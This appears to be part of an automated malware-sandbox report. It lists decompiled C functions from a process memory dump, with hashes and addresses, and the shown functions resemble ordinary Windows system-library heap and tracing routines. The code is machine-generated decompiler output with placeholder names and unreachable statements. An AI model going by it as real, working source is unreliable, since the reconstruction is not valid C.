0x048fc5ca
0x048fc5c4
0x048fc5c8
0x00000000
0x00000000
0x00000000
0x048fc5ad
0x00000000
0x048fc5af

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e1fefba3427c97bc1fe241c8af0d66233a526cbcadefbfd8547d248b55428a
Instruction ID: cbbf3ce155ddb5af713d3a8b1fc1749533ba94cc44a96d2f8b1114db17298344
Opcode Fuzzy Hash: c2e1fefba3427c97bc1fe241c8af0d66233a526cbcadefbfd8547d248b55428a
Instruction Fuzzy Hash: EEF090B2D156AC9EE731DF688804B227FD4BB0D774F444E66D615C7202C6A4FA84C251

Uniqueness

Uniqueness Score: -1.00%

Function 049A8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E049A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x49cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E048F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0491B640(E04919AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x049a8d34
0x049a8d43
0x049a8d4b
0x049a8d4e
0x049a8d52
0x049a8d5c
0x049a8d6e
0x049a8d5e
0x049a8d67
0x049a8d67
0x049a8d79
0x049a8d7a
0x049a8d7c
0x049a8d81
0x049a8d94

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7aed7e88ad1acdf4e9f508124d90a19ca813c3c1b5166b9eb563aa671fcff2
Instruction ID: 85c5378fc48f0e721681de54621dbdd71a3abea9e8d60e47e7d5a559602628da
Opcode Fuzzy Hash: 5e7aed7e88ad1acdf4e9f508124d90a19ca813c3c1b5166b9eb563aa671fcff2
Instruction Fuzzy Hash: 20F0B470E0460C9FD704EFB8D541A6E77B4EF58304F5084B9E905EB290EA38E900C794

Uniqueness

Uniqueness Score: -1.00%

Function 04992073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04992073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0498FD22(__ecx);
				_t19 =  *0x49c849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x49c8748; // 0x0
					if(__eflags <= 0) {
						E04991C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x49c8724 & 0x00000004;
							if(( *0x49c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x49c8724; // 0x0
					return E04988DF1(__ebx, 0xc0000374, 0x49c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04992076
0x04992078
0x0499207d
0x04992083
0x049920a4
0x049920aa
0x049920ac
0x049920b7
0x049920ba
0x049920bc
0x049920c9
0x049920c9
0x049920d0
0x049920d2
0x00000000
0x049920d2
0x049920be
0x049920c3
0x049920c5
0x049920c7
0x00000000
0x00000000
0x049920c7
0x049920bc
0x049920d4
0x04992085
0x04992085
0x049920a3
0x049920a3

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc82868727415067d33cdede55ea2269f68548d9a31a12ffa944242ccaecaaa0
Instruction ID: 4fdd007f29ee0e918404fd4fdacdc9362e2deb1871bb5e8164cb4903f0937bb8
Opcode Fuzzy Hash: cc82868727415067d33cdede55ea2269f68548d9a31a12ffa944242ccaecaaa0
Instruction Fuzzy Hash: 90F0A06A41A394BBEF32FF2DA1012E62FD8D7C5219B4A18F9D59057205D539BC83CA20

Uniqueness

Uniqueness Score: -1.00%

Function 0491927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0491927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0491FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E049192C6(_t11, _t14);
				}
				return _t11;
			}

0x04919295
0x04919299
0x0491929f
0x049192aa
0x049192ad
0x049192ae
0x049192af
0x049192b0
0x049192b4
0x049192bb
0x049192bb
0x049192c5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 005a9f4d2938fc1eaeaf6e2ac912a9ebb15ac2a850ddb1008e32d8f2ede19070
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: F0E02B723405002BF7219E09CC80F03376DDFC2724F004479B5045F252C6E9ED08C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 049A8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E049A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49cd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E048F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0491B640(E04919AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x049a8ce5
0x049a8ced
0x049a8cf0
0x049a8cfb
0x049a8d0d
0x049a8cfd
0x049a8d06
0x049a8d06
0x049a8d18
0x049a8d19
0x049a8d1b
0x049a8d20
0x049a8d33

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c07bbb04f007d00610df276ac6ff346aac8e71caaa45c57b512abb4ebb405061
Instruction ID: 9eb50537a68efa77b03cfbccf12a8d7391b30b41897f6af63486e1b690019d74
Opcode Fuzzy Hash: c07bbb04f007d00610df276ac6ff346aac8e71caaa45c57b512abb4ebb405061
Instruction Fuzzy Hash: CBF08970A0514C9BDB04EBA8D945D6E77B4EF58304F500569E515EB290EA34E900C754

Uniqueness

Uniqueness Score: -1.00%

Function 048F746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E048F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E048EEB70(__ecx, 0x49c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E049195D0();
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x048f746d
0x048f746d
0x048f746d
0x048f7471
0x048f7488
0x0493f92d
0x048f748e
0x048f7491
0x048f7495
0x0493f937
0x0493f93a
0x0493f94e
0x0493f953
0x0493f956
0x0493f956
0x048f7495
0x00000000
0x048f7488
0x048f7473
0x048f7478
0x048f747d
0x048f7481
0x00000000
0x048f7481
0x048f747d
0x048f747a
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49a5d2e8aa067c556e1b8b8ebcf03bb1bbe30e81223172c9d9430d1a1bd43dc
Instruction ID: e587b430765e5fa3a35afe8e22dd5905df4ab19b7f94a7666ab0f42bd13a5748
Opcode Fuzzy Hash: e49a5d2e8aa067c556e1b8b8ebcf03bb1bbe30e81223172c9d9430d1a1bd43dc
Instruction Fuzzy Hash: 64F0BE34A00148AAFF019B68CC40F79BBA2AF25358F040F69DA51EB160F764B802CB96

Uniqueness

Uniqueness Score: -1.00%

Function 048D4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E049A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E048FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x48b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x048d4f2e
0x048d4f34
0x048d4f38
0x04930b85
0x04930b85
0x04930b89
0x04930b9a
0x04930b9a
0x04930b9f
0x00000000
0x04930b9f
0x04930b94
0x04930b98
0x00000000
0x00000000
0x00000000
0x04930b98
0x048d4f3e
0x048d4f48
0x00000000
0x048d4f6e
0x00000000
0x048d4f70

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f8abcb4224a38737abfcf0df4ae33d1fb1e8d197e1618e02123eb0efcface3c
Instruction ID: 770fb47127cf3904c31d47c8fd055462eeb6e9022c7f50ae36e51db00c5ff65c
Opcode Fuzzy Hash: 2f8abcb4224a38737abfcf0df4ae33d1fb1e8d197e1618e02123eb0efcface3c
Instruction Fuzzy Hash: 75F0BE329266988FEB61DB18C144B22B7E8AB067B9F0449B4D80587A24C724FC44C680

Uniqueness

Uniqueness Score: -1.00%

Function 049A8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E049A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x49cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E048F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0491B640(E04919AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x049a8b67
0x049a8b6f
0x049a8b72
0x049a8b7d
0x049a8b8f
0x049a8b7f
0x049a8b88
0x049a8b88
0x049a8b9a
0x049a8b9b
0x049a8b9d
0x049a8ba2
0x049a8bb5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58848073a1384d82ea750d3f65ef093d0586d318b7e0cd112ab996ab26bb6fbf
Instruction ID: fcf1c9eecd99992558a01ad7609a04d60957e8c127591b49875827123c5f2f83
Opcode Fuzzy Hash: 58848073a1384d82ea750d3f65ef093d0586d318b7e0cd112ab996ab26bb6fbf
Instruction Fuzzy Hash: 34F082B0A0425CAFEB04EBA8D906E7E77B8FF44304F440569BA05DB390EA74E904C794

Uniqueness

Uniqueness Score: -1.00%

Function 0490A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0490A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x49c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0491FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0490a44b
0x0490a453
0x0490a472
0x0490a476
0x00000000
0x0490a493
0x0490a47a
0x0490a47f
0x0490a486
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23496f34ce26bfcb91af1542b820a35eae4740bae51bb266e52d1f42882ac84d
Instruction ID: e1f5da4fb4f31fae5c4bd3f20a2059bbaeef3094cf2433083bee8ae3362bfe08
Opcode Fuzzy Hash: 23496f34ce26bfcb91af1542b820a35eae4740bae51bb266e52d1f42882ac84d
Instruction Fuzzy Hash: 1EE09272A41421AFE3115E59EC00F6773ADDBE4B55F094435E504C7254D668ED01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 048DF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E048DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0490F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L048F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x048df35d
0x048df361
0x048df367
0x048df372
0x048df38c
0x048df38c
0x048df394

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 0dfffa7750e8219287eb4a33478889071b5ac55277f926459208e5d303bec907
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: AAE06832A01118BFDB34A7CC9D01F5BBBACDB44B70F010251BB04D7050C460AE00D3D0

Uniqueness

Uniqueness Score: -1.00%

Function 048EFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x48b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E049A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E048F0050(_t14);
				}
			}

0x048eff66
0x048eff6b
0x00000000
0x048eff8f
0x00000000
0x048eff8f

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e75a10b41aa5ae1ab9cede91119e8a46fd1924c2f00ff77d36a79aba0ca538
Instruction ID: e62653d042a0bb76b7f092eda93c63c17782f19a8bd0ba9442131727c37487b3
Opcode Fuzzy Hash: 56e75a10b41aa5ae1ab9cede91119e8a46fd1924c2f00ff77d36a79aba0ca538
Instruction Fuzzy Hash: 3EE09AB0205244AEEB34EB96D150F3537989B87629F198A19EB08CB202DE21F880C34A

Uniqueness

Uniqueness Score: -1.00%

Function 049641E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E049641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x49b08f0);
				_t5 = E0492D08C(__ebx, __edi, __esi);
				if( *0x49c87ec == 0) {
					E048EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x49c87ec == 0) {
						 *0x49c87f0 = 0x49c87ec;
						 *0x49c87ec = 0x49c87ec;
						 *0x49c87e8 = 0x49c87e4;
						 *0x49c87e4 = 0x49c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04964248();
				}
				return E0492D0D1(_t5);
			}

0x049641e8
0x049641ea
0x049641ef
0x049641fb
0x04964206
0x0496420b
0x04964216
0x0496421d
0x04964222
0x0496422c
0x04964231
0x04964231
0x04964236
0x0496423d
0x0496423d
0x04964247

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d4a1212fde09075fc30c9196df69a052e21b411e39256b24ad5d37e1caed37
Instruction ID: a5447c037f212ee0b903808402a98ae4baf5e11522b1c56e7b66130e3e51336a
Opcode Fuzzy Hash: f1d4a1212fde09075fc30c9196df69a052e21b411e39256b24ad5d37e1caed37
Instruction Fuzzy Hash: BEF01C74895700CFEB60FFAAD5047143AA4F7C4356F114139C00187A98E7786940CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0498D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0498D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L048DE8B0(__ecx, _a4, 0xfff);
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0498d38a
0x0498d39b
0x0498d3b1
0x00000000
0x0498d3b6
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: f4eb16ac663cf45aa1997d571a6a448f019c2582192ce6e138c036091d3e52dc
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: A6E0CD31241648B7EB216E48CC00F797716DB407A4F104535FE049A6D0C675BC51E6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0490A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0490A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x49c67e4 >= 0xa) {
					if(_t5 < 0x49c6800 || _t5 >= 0x49c6900) {
						return L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E048F0010(0x49c67e0, _t5);
				}
			}

0x0490a190
0x0490a1a6
0x0490a1c2
0x00000000
0x00000000
0x00000000
0x0490a192
0x0490a192
0x0490a19f
0x0490a19f

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4726d418ca497d0c2e2691174dd9a18186fc6c2d09525701b31e4fe7cd0d78
Instruction ID: 67a2a0e1312588bae43b7ec31ea436a2f8112ba1b4a81e640fd1717b8e89fa2b
Opcode Fuzzy Hash: fc4726d418ca497d0c2e2691174dd9a18186fc6c2d09525701b31e4fe7cd0d78
Instruction Fuzzy Hash: 12D05B611713007EF71D6714AD54F252292E7D8758F308D3DF2475A5D0DAA4FCD4918A

Uniqueness

Uniqueness Score: -1.00%

Function 049016E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04901710(0x49c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L048F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x049016e8
0x049016ef
0x049016f3
0x049016fe
0x00000000
0x04901700
0x0490170d
0x0490170d
0x049016f2
0x049016f2
0x049016f2
0x049016f2

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a4c6ff40bf42eab47942ea609193e16bbd122782f4b09b5229377d0cde9d42a
Instruction ID: b7b594556d3ad649ccd1293ec93374e59a178eb0e0fe12c333a911be82703f1a
Opcode Fuzzy Hash: 0a4c6ff40bf42eab47942ea609193e16bbd122782f4b09b5229377d0cde9d42a
Instruction Fuzzy Hash: 9DD0A7311402009AFE2D5B149C05B152259EBC0B89F38047CF207594C0CFA6FD92E458

Uniqueness

Uniqueness Score: -1.00%

Function 049553CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E048EEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x049553ca
0x049553ce
0x049553d9
0x049553de
0x049553e1
0x049553e1
0x049553e6
0x049553f3
0x00000000
0x049553f8
0x049553fb

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 5b66a358292bcab1f7eff8f169abca58e934ddc108f515d683f1374ff8eb26e1
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: F4E08C31900684EBDF12DB49CA90F5EB7F9FB84B00F250414A808AB631C674BC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 049035A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E048EEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x049035a1
0x049035a1
0x049035a5
0x049035ab
0x049035ab
0x049035b5
0x00000000
0x049035c1
0x049035b7

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: b3aa4323db52477632d40eed3715997ac39e9fc42891e0be92eedf282d88e4b9
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 1BD0A9319015809EEB21AB10C22877833BBBB80308F58A4758C0A068F2C33AEA0AD601

Uniqueness

Uniqueness Score: -1.00%

Function 048EAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x048eaab6
0x048eaabb
0x0493a442
0x00000000
0x0493a448
0x0493a454
0x0493a454
0x048eaac1
0x048eaac1
0x048eaac6
0x048eaac6

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 4456d93e7eca15dece73bb0c2af569932ec8a34240b71f3404c34a90f59b0651
